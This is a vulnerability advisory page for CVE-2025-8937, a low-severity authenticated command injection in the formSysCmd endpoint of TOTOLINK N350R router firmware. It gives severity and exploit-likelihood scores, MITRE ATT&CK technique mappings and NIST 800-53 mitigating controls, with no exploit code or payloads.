Cyber Resilience

CVE-2025-8937

Low

Published: 14 August 2025

Published
14 August 2025
Modified
29 April 2026
KEV Added
Patch
CVSS Score v4 2.1 CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0172 82.8th percentile
Risk Priority 5 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-8937 is a low-severity Injection (CWE-74) vulnerability in Totolink N350R Firmware. Its CVSS base score is 2.1 (Low).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 17.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

A vulnerability has been identified in the TOTOLINK N350R router running firmware version 1.2.3-B20130826. The issue resides in an unspecified portion of the /boafrm/formSysCmd endpoint and stems from improper handling of user-supplied input, resulting in command injection as classified under CWE-74 and CWE-77. The flaw is remotely reachable and carries a CVSS 4.0 score of 2.1, reflecting the need for an authenticated low-privileged account but no user interaction.

An attacker who can authenticate to the device can supply crafted parameters to the affected form handler, causing arbitrary operating-system commands to execute on the router. Successful exploitation grants limited control over the device, including the ability to read, modify, or delete data within the scope of the compromised process. Public proof-of-concept material has already been released, confirming that the attack can be carried out over the network.

The associated EPSS score remains low and unchanged at 0.0172, indicating no significant increase in observed exploitation interest since disclosure. The referenced materials consist of exploit documentation hosted on GitHub and corresponding Vuldb entries; no vendor advisory or patch information is included among them.

EU & UK References

Vulnerability details

A vulnerability has been found in TOTOLINK N350R 1.2.3-B20130826. This vulnerability affects unknown code of the file /boafrm/formSysCmd. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may…

more

be used.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.008 Network Device CLI Execution
Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads.
Why these techniques?

Direct command injection in public web management interface (formSysCmd) enables remote exploitation of network device and arbitrary command execution via its CLI.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-5020Same vendor: Totolink
CVE-2026-1548Same vendor: Totolink
CVE-2026-1326Same vendor: Totolink
CVE-2026-5030Same vendor: Totolink
CVE-2026-5178Same vendor: Totolink
CVE-2026-1150Same vendor: Totolink
CVE-2026-5105Same vendor: Totolink
CVE-2026-5176Same vendor: Totolink
CVE-2025-9935Same vendor: Totolink
CVE-2025-7615Same vendor: Totolink

Affected Assets

totolink
n350r firmware
1.2.3-b20130826

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires validation of inputs to the /boafrm/formSysCmd endpoint to block command injection strings before they reach the underlying system command processor.

prevent

Enforces access-control decisions on the formSysCmd handler so that only explicitly authorized subjects can invoke the command-execution path.

prevent

Requires timely application of vendor patches or firmware updates that eliminate the command-injection flaw in formSysCmd.

References